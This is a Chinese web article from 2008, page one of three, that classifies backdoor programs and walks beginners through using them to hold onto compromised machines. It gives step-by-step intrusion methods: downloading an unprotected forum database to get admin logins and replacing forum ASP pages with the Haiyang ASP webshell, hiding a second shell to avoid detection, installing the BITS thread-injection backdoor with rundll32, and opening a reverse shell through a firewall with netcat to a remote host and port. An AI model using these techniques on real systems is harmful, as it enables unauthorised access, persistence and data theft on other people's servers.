后门的分类及各种入侵办法说明
添加时间: 2008-3-6 16:18:42 作者: 网络安全 阅读次数:117 来源: http://www.d9soft.com
什么是后门程序
后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。
后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。
后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一个新的账号,或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的安全认证而对系统有安全存取权。例如一个login程序,你当输入特定的密码时,你就能以管理员的权限来存取系统。
后门能相互关联,而且这个 技术被许多黑客所使用。例如,黑客可能使用密码破解一个或多个账号密码,黑客可能会建立一个或多个账号。一个黑客可以存取这个系统,黑客可能使用一些 技术或利用系统的某个漏洞来提升权限。黑客可能使用一些技术或利用系统的某个漏洞庭湖来提升权限。黑客可能会对系统的配置文件进行小部分的修改,以降低系统的防卫性能。也可能会安装一个木马程序,使系统打开一个安全漏洞,以利于黑客完全掌握系统。
以上是在网络上常见的对“后门”的解释,其实我们可以用很简单的一句话来概括它:后门就是留在计算机系统中,供某位特殊使用都通过某种特殊方式控制计算机系统的途径!——很显然,掌握好后门技术是每个网络安全爱好者不可或缺的一项基本技能!它能让你牢牢抓住肉鸡,让它永远飞不出你的五指山!
下文将以笔者从事网络安全多年的工作经验为基础,给广大的网络初级安全爱好者讲解一些网络上常 用的后门的种类和使用方法以及技巧,希望大家能在最短的时间内学习到最好的技术,提升自己的网络安全技术水平!
后门的分类
后门可以按照很多方式来分类,标准不同自然分类就不同,为了便于大家理解,我们从技术方面来考虑后门程序的分类方法:
1.网页后门
此类后门程序一般都是服务器上正常 的web服务来构造自己的连接方式,比如现在非常流行的ASP、cgi脚本后门等。
2。线程插入后门
利用系统自身的某个服务或者线程,将后门程序插入到其中,具体原理原来《黑客防线》曾具体讲解过,感兴趣的朋友可以查阅。这也是现在最流行的一个后门技术。
3扩展后门
所谓的“扩展”,是指在功能上有大的提升,比普通的单一功能的后门有很强的使用性,这种后门本身就相当于一个小的安全工具包,能实现非常多的常驻见安全功能,适合新手使用————但是,功能越强,个人觉得反而脱郭后门“隐蔽”的初衷,具体看法就看各位使用都的喜好了。
4.c/s后门
和传统的木马程序类似的控制方法,采用“客记端/服务端”的控制方式,通过某种特定的访问方式来启动后门进而控制服务器。
5.root kit
这个需要单独说明,其实把它单独列一个类在这里是不太恰当的,但是,root kit 的出现大大改变了后门程序的思维角度和使用理念,可以说一个好的root kit就是一个完全的系统杀手!后文我们讲涉及到这方面,想念一定不会让大家失望!
上面是按照技术做的分类,除了这些方面,正向连接后门、反向连接后门等分类也是很常见的,其实如何分类是编程者考虑的事,广大的使用者就不用考虑那么多了,我们看重的,只是功能!
入侵————精品后门
上面的“废话”想念大家都看累了吧?好,下面我们来看看现在网络中浒的后门究竟长什么模样想学习网络安全并想提高的朋友看清楚了哦,这可是让你的肉鸡逃不出你的五指山的大好途径!
1.网页后门
近段时间网络上针对系统漏洞的攻击事件渐渐少了,因为大家在认识到网络安全的重要性之后,最简单却又最有效的防护办法:升级,都被大家所认同,所以系统漏洞在以后的岁月中存活的周期会越来越短,而从最近的趋势来看,肢本漏洞已经渐渐取代了系统漏洞的地位,非常多的人开始研究起却本漏洞来,sql注入也开始成为各大安全站点首要关注热点,而说到脚本、网页后门当然就是不得不说的重头戏了,现在国内入侵的主流趋势是先利用某种脚本漏洞上传脚本后门,然后浏览服务器内安装和程序,找到提升权限的突破口,进而拿到服务器的系统权限。
现在asp、CGI、PHP这三个脚本大类在网络上的普遍运用带来了脚本后门在这三方面的发展,下面我们一一道来:
海阳顶端ASP木马
这是ASP脚本方面流传非常广的一个脚本后门了,在经过几次大的改革后,推出了“海阳顶端ASP木马XP版”、“海阳顶端ASP木马红粉佳人版”等功能强大、使用方便的后门,想念经常接解脚步本安全的朋友对这些都不会陌生。
类型:网页木马
使用范围:支持ASP、WEB访问
使用难度:★☆☆☆☆
危害程序:★★★☆☆
查杀难度:★★★☆☆
现在的服务器系统配置都相对安全,公开的系统漏洞存在的机会很少,于是脚本方面的漏洞就开始火起来。首先我们通过某种途径获得一个服务器的页面权限(比如利用论坛上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定程序),然后我们可以通过简单的上传ASP程序或者是直接复制海阳项端的代码,然后通过WEB访问这个程序,就能很方便地查阅服务器上的资料了,下面举个简单的便子(由于只是简单的介绍,下文便子不会太难或者太普遍,希望大家理解)。
运用举便
leadbbs2.77曾经风靡网络,它是个很典型的ASP论坛,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜级别的网络管理员总是喜欢默认安装,然后启用论坛,我们只需要很简单地在IE中输入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该论坛的数据库了,而且没有MD5加密哦!,我们直接找到管理员的账户和密码,然后登录论坛,到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码,然后执行GUEST权限的CMD命令,方便的上传/下载将定程序、远程执行程序等,这样一个隐藏的后门就建好了!取得服务器的SYSTEM权限就看大家自己的办法了。
一般来讲,海洋的功能是非常强大的,而且不容易被查杀(一个朋友采取的方式是:先利用某个脚本漏洞上传网页后门,再通过海洋上传另一个后门到隐蔽的路径,然后通过最后上传的后门来删除第一次上传的海洋,这样后门的存放路径就可以放得非常深了,普通管理员是很难发现的),如果管理员觉得自己可能中了这里边样的后门,可以利用论坛备份来恢复自己的页面系统,再配合系统日志、论坛日志等程序检查系统,发现可疑ASP文件打开看看海洋是很好识别的,再删除就可以了。
脚本方面的后门还有CGI和PHP两面三刀大类,使用原理都差不多,这里就不再多介绍,在黑防论坛也收录了这三种后门,大家可以下载后自己研究。
2.线程插入后门
首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说,即使受控制端安装的防火墙拥有“应用程序访问权限”的功能,也不能对这样的后门进行有效的警告和拦截,也就使对方的防火墙形同虚设了!这种后门是现在非常主流的一种,很让防护的人头疼,因为对它的查杀比较困难,这种后门本身的功能比较强大,是“居中家旅行、入侵攻击”的必备品哦!
这类的典范就是国内提倡网络共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的朋友使用它的过程中感到了方便。
类型:系统后门
使用范围:wind200/xp/2003
隐蔽程序:★★★★☆
使用难度:★★★☆☆
查杀难度:★★★★☆
BITS其实是Background Intelligent Transfer Servicer的缩写,可以在不知不觉中实现另一种意义的典型的线程插入后门,有以下特点:进程管理器中看不到;平时没有端口,只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。
运用举例
首先我们用3389登录上肉鸡,确定你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令:
rundll32.exe bits.dll,install
这样就激活了BIST,程序用这个特征的字符来辨认使用者,也就相当于你的密码了,然后卸载:rundll32.exe BITS.dll,Uninstall
这是最简单的使用,这个后门除了隐蔽性好外,还有两大特点是非常 值得借鉴的:端口复用和正反向连接。虽然很多朋友经常听到这两个名词,但并不了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如80、139等,这样的后门有个非常 大的好处就是非常 隐蔽,不用自己开端口也不会暴露自己的访问,因为通讯本身就是系统的正常访问!另一个是反向连接,这个很常 见,也是后门中一个经典思路,因为从服务器上主动方问外边是不被禁止的,很多很历害的防火墙就怕这点!
BITS的正向连接很简单,大家可以参考它的README,这种方式在服务器没有防火墙等措施的时候很管用,可以方便地连接,但是遇到有防火墙这样的方式就不灵了,得使用下面的反向连接方式:
在本地使用NC监听(如:nc -l -p 1234)
用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)
输入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]
目标主机的CMD将会出现NC监听的端口2222,这样就实现了绕过防火墙的功能了。
devil5(魔鬼5号)
类型:系统后门
使用范围:win200/xp/2003
隐蔽程度:★★★★☆
使用难度:★★☆☆☆
危害程序:★★★★☆
查杀难度:★★★☆☆
同BITS一样,Devil5也是线程插入式的后门,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程,适合对系统有一定了解的使用都使用,由于是自定义插入线程,所以它更难被查杀,下面我们来看看它的使用。
运用举例:
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制,一般设置成系统自带的SVCHOST,然后运行后门就可以控制了。
后门的分类及各种入侵办法说明(1) 第 [1] [2] [3] 下一页
上一篇文章: 针对Linux网络服务器的渗透测试 下一篇文章: 技巧:交换机安全设置六大原则